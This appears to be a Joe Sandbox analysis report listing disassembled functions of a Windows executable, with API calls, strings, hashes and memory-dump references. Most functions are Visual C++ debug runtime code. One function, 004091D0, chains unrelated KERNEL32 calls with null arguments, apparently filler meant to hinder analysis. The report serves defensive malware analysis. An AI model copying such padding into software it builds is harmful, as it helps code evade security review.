                    • Instruction ID: 05fde6d1f051610231dcbb5ecbc7f79fefaaa8557931b5993733cb8e654fd9f0
                    • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                    • Instruction Fuzzy Hash: 750116768106629BD740DF3EC88045ABBF1BB082117528B2AD8A483A41D338E662DAE4
                    Function 004152CE Relevance: 110.7, APIs: 40, Strings: 23, Instructions: 431COMMON
                    Download Yara Rule
                    APIs
                    • InterlockedIncrement.KERNEL32(004B8F60), ref: 004152D3
                    • __invoke_watson_if_error.LIBCMTD ref: 00415312
                    • OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 0041531F
                    • OutputDebugStringA.KERNEL32(dP@), ref: 00415347
                    • OutputDebugStringA.KERNEL32(, Line ), ref: 00415352
                    • OutputDebugStringA.KERNEL32(?), ref: 0041535F
                    • OutputDebugStringA.KERNEL32(00405058), ref: 0041536A
                    • _wcscat_s.LIBCMTD ref: 0041552A
                      • Part of subcall function 00416D60: __errno.LIBCMTD ref: 00416DB4
                      • Part of subcall function 00416D60: __invalid_parameter.LIBCMTD ref: 00416DD2
                    • __invoke_watson_if_error.LIBCMTD ref: 00415533
                      • Part of subcall function 0040D5B0: __invoke_watson.LIBCMTD ref: 0040D5D1
                    • _wcscat_s.LIBCMTD ref: 00415562
                      • Part of subcall function 00416D60: _memset.LIBCMT ref: 00416E3B
                      • Part of subcall function 00416D60: __errno.LIBCMTD ref: 00416E79
                      • Part of subcall function 00416D60: __invalid_parameter.LIBCMTD ref: 00416E97
                    • __invoke_watson_if_error.LIBCMTD ref: 0041556B
                    • __errno.LIBCMTD ref: 00415587
                    • __errno.LIBCMTD ref: 00415594
                    • __errno.LIBCMTD ref: 004155F5
                    • __invoke_watson_if_oneof.LIBCMTD ref: 004155FD
                    • __errno.LIBCMTD ref: 00415605
                    • _wcscpy_s.LIBCMTD ref: 00415642
                    • __invoke_watson_if_error.LIBCMTD ref: 0041564B
                    • __cftoe.LIBCMTD ref: 004156BF
                    • __invoke_watson_if_oneof.LIBCMTD ref: 004156EE
                    • _wcscpy_s.LIBCMTD ref: 00415726
                    • __invoke_watson_if_error.LIBCMTD ref: 0041572F
                    • __itow_s.LIBCMTD ref: 00415309
                      • Part of subcall function 0041B9D0: _xtow_s@20.LIBCMTD ref: 0041B9FB
                    • __errno.LIBCMTD ref: 00415398
                    • __errno.LIBCMTD ref: 004153A5
                    • __strftime_l.LIBCMTD ref: 004153C9
                    • __errno.LIBCMTD ref: 004153FA
                    • __invoke_watson_if_oneof.LIBCMTD ref: 00415402
                    • __errno.LIBCMTD ref: 0041540A
                    • _wcscpy_s.LIBCMTD ref: 00415447
                    • __invoke_watson_if_error.LIBCMTD ref: 00415450
                    • _wcscpy_s.LIBCMTD ref: 004154A3
                    • __invoke_watson_if_error.LIBCMTD ref: 004154AC
                    • _wcscat_s.LIBCMTD ref: 004154DD
                    • __invoke_watson_if_error.LIBCMTD ref: 004154E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno$__invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__cftoe__invoke_watson__itow_s__strftime_l_memset_xtow_s@20
                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$dP@$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                    • API String ID: 3689284098-2747297256
                    • Opcode ID: b6a9008b2aa7cec5da2332bae4d65e128eff224c310c0f69e0dbff31b9814711
                    • Instruction ID: fadcdbc550a2d3b83f07a2b29553fda8f94230b036641e3f1cb1cfbe9f77c5a3
                    • Opcode Fuzzy Hash: b6a9008b2aa7cec5da2332bae4d65e128eff224c310c0f69e0dbff31b9814711
                    • Instruction Fuzzy Hash: 9B0292B4940708EBDB20EF50DC4AFDF7774AB94745F1041AAB6087A2C1D6B89AC4CF99
                    Function 00411D96 Relevance: 65.0, APIs: 17, Strings: 20, Instructions: 220COMMON
                    Download Yara Rule
                    APIs
                    • _wcscpy_s.LIBCMTD ref: 00411DBD
                      • Part of subcall function 0040D100: __errno.LIBCMTD ref: 0040D154
                      • Part of subcall function 0040D100: __invalid_parameter.LIBCMTD ref: 0040D172
                    • __invoke_watson_if_error.LIBCMTD ref: 00411DC6
                    • _strlen.LIBCMT ref: 00411DDB
                    • _strlen.LIBCMT ref: 00411DEC
                    • _memcpy_s.LIBCMTD ref: 00411E34
                    • __invoke_watson_if_error.LIBCMTD ref: 00411E3D
                      • Part of subcall function 0040D5B0: __invoke_watson.LIBCMTD ref: 0040D5D1
                    • _strlen.LIBCMT ref: 00411E4F
                    • _strlen.LIBCMT ref: 00411E60
                    • __errno.LIBCMTD ref: 00411E72
                    • __errno.LIBCMTD ref: 00411E7F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _strlen$__errno$__invoke_watson_if_error$__invalid_parameter__invoke_watson_memcpy_s_wcscpy_s
                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$Phx>@$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$h6@$h6@$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$>@
                    • API String ID: 1303265743-2950373839
                    • Opcode ID: c1c305ca01c11ac5c9aafc68afc43bfbfe80d1b62fcfeca055d58e896e896e11
                    • Instruction ID: 0091046068a78a31d37abff22401d232b71df5a98ebb75087f8915e9e2dfe1f6
                    • Opcode Fuzzy Hash: c1c305ca01c11ac5c9aafc68afc43bfbfe80d1b62fcfeca055d58e896e896e11
                    • Instruction Fuzzy Hash: 50919EB0E00209ABDB24DF91DC42BEA7774AB48705F1041ABF609762D1D7B89AC5CF99
                    Function 0041BE43 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                    Download Yara Rule
                    APIs
                    • __errno.LIBCMTD ref: 0041BE76
                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041BE8B
                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041BEC1
                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041BEE2
                    • wcsncnt.LIBCMTD ref: 0041BF19
                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041BF4A
                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041BF7F
                    • _wcslen.LIBCMTD ref: 0041C18F
                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041C19D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide__errno_wcslenwcsncnt
                    • String ID:
                    • API String ID: 4157245263-0
                    • Opcode ID: 7a112b2fdb344dee52fb48fc0b7657fe02d4c2893acf6ca18db0f6b3049fb803
                    • Instruction ID: a0f9310d9811c8a69f6e07c24636dabc90ea0c2b3b290fe57e0764f406a91e38
                    • Opcode Fuzzy Hash: 7a112b2fdb344dee52fb48fc0b7657fe02d4c2893acf6ca18db0f6b3049fb803
                    • Instruction Fuzzy Hash: 37D1F771940208EFCB04EF94D995BEEB771FF45304F20825AE4166B2A1D738AE85DF98
                    Function 004207C9 Relevance: 37.1, APIs: 16, Strings: 5, Instructions: 368COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                    • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 3451365851-3266125857
                    • Opcode ID: 21ea31a9ca08ed31b99e96242e0f093373d5420f1aa8d9894b5d7aeb6bf8dbd6
                    • Instruction ID: 0318c0b250ea772266c12d4ef0c6f3489277d53e972c0257111fd392de69c2aa
                    • Opcode Fuzzy Hash: 21ea31a9ca08ed31b99e96242e0f093373d5420f1aa8d9894b5d7aeb6bf8dbd6
                    • Instruction Fuzzy Hash: 66F15BB1E052299FEB24CF59DC89BEEB7B1BB44304F5081DAE009A7252D7785E80CF59
                    Function 0042206B Relevance: 35.4, APIs: 16, Strings: 4, Instructions: 365COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                    • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 3455034128-2408376751
                    • Opcode ID: 2a51052cc8fd03976d40228c6e0b60bcc7ddd1c62ab3841449f1c3c81c14149e
                    • Instruction ID: 9dbf378d780c68b79f1a579901292039a2aad64af54f9e5e6f17a86e628dd742
                    • Opcode Fuzzy Hash: 2a51052cc8fd03976d40228c6e0b60bcc7ddd1c62ab3841449f1c3c81c14149e
                    • Instruction Fuzzy Hash: 26F16DB1E00229EFDB24CF54DD81BAEB7B1BF84304F54419AE609A7241D7789E84CF5A
                    Function 0041AA44 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno$_memset$__invalid_parameter$__vsnprintf_helper
                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                    • API String ID: 1345965814-3148381236
                    • Opcode ID: 57428024f7948654b58d04f6e9974d1919385b3038ac2dcb7206c9d993a719f6
                    • Instruction ID: 70a6837af2a6149165e4102e17bc1152700ea8d52e2d41153902bc0e3ad72d59
                    • Opcode Fuzzy Hash: 57428024f7948654b58d04f6e9974d1919385b3038ac2dcb7206c9d993a719f6
                    • Instruction Fuzzy Hash: 9F918070901209EFCF14DF68C941BEE7371AF54328F20825AF52A673D1D7789AA1CB5A
                    Function 00411F90 Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 105windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof_raise_wcscpy_s
                    • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$Phx>@$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$h6@$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$>@
                    • API String ID: 2974351053-2203283237
                    • Opcode ID: 422fe099063b2440e5b83b0571e852efa2270c7a14f5d194f432752f0785545c
                    • Instruction ID: d2dd7fcf7ef0712030adf6bb74022c834a00212d66ffb03b9530eca00b56fb9e
                    • Opcode Fuzzy Hash: 422fe099063b2440e5b83b0571e852efa2270c7a14f5d194f432752f0785545c
                    • Instruction Fuzzy Hash: 844183B0A40218ABCB28DF91DC42FDA77746B48745F1040AAF308772C1D6B89AC0CF59
                    Function 0040BAD5 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 264memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 0040BAF9
                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 0040BD61
                    • tDj, xrefs: 0040BB2B
                    • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 0040BD9A
                    • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040BBDF
                    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040BB8D, 0040BBEB, 0040BDA6
                    • _CrtIsValidHeapPointer(pUserData), xrefs: 0040BB81
                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040BD23
                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040BC69
                    • Client hook free failure., xrefs: 0040BB4C
                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 0040BCA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: BytesCheck$HeapPointerValid__errno__free_base_memset
                    • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj
                    • API String ID: 2211402958-3417358119
                    • Opcode ID: cd9c7fe65bb26faa894c3a6f1503966eb4ccc588ea9b6aa319045515c796745e
                    • Instruction ID: 4192e05cdbdc2300cbf87dee9c2afb2f865ff02bf5915b49663efd84da3a76ac
                    • Opcode Fuzzy Hash: cd9c7fe65bb26faa894c3a6f1503966eb4ccc588ea9b6aa319045515c796745e
                    • Instruction Fuzzy Hash: 26919F74A40204ABEB28DB44DD82F6A7365EB48704F344169F604BB3D2D779EE40DADD
                    Function 00420527 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 1135781078-2363074782
                    • Opcode ID: 65dafc6e80f46ce005d844b4f86b4ad718f06fd5d9c114d018782d672af67ce1
                    • Instruction ID: dbec91664318c7e18e9e5ce58d2864670cb808cc997bc4ec3a531299316c5514
                    • Opcode Fuzzy Hash: 65dafc6e80f46ce005d844b4f86b4ad718f06fd5d9c114d018782d672af67ce1
                    • Instruction Fuzzy Hash: E8A1A0B0E012289BDB24DF55DC49BEEB7B0EB48304F5081DAE0197A292D7789EC4CF59
                    Function 00421DCA Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 238COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                    • API String ID: 3689974179-1989478660
                    • Opcode ID: 021614e53653cf6ac6f471f3e26954ac1e60a408170ac2974f695aa85c06ff38
                    • Instruction ID: 5cf5f1679637e714eaf0f5d77fffc54960f063e41b6954f2f48d98442a76b826
                    • Opcode Fuzzy Hash: 021614e53653cf6ac6f471f3e26954ac1e60a408170ac2974f695aa85c06ff38
                    • Instruction Fuzzy Hash: 1BA181B0E00229ABDB24DF54DD81BAEB7B4AB54304F50819AE6097B281D77C9E84CF5D
                    Function 004091D0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 73timepipethreadCOMMON
                    Download Yara Rule
                    APIs
                    • BuildCommDCBAndTimeoutsA.KERNEL32 ref: 0040920C
                    • GetDriveTypeW.KERNEL32(00000000), ref: 00409214
                    • CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409228
                    • GetThreadPriority.KERNEL32(00000000), ref: 00409230
                    • InitAtomTable.KERNEL32(00000000), ref: 00409238
                    • AddAtomW.KERNEL32(00000000), ref: 00409240
                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040924A
                    • WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 0040925B
                    • ResetWriteWatch.KERNEL32(00000000,00000000), ref: 00409265
                    • FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 00409274
                    • CreateTimerQueue.KERNEL32 ref: 0040927A
                    • LocalFree.KERNEL32(00000000), ref: 00409282
                    • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409292
                    • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 0040929E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
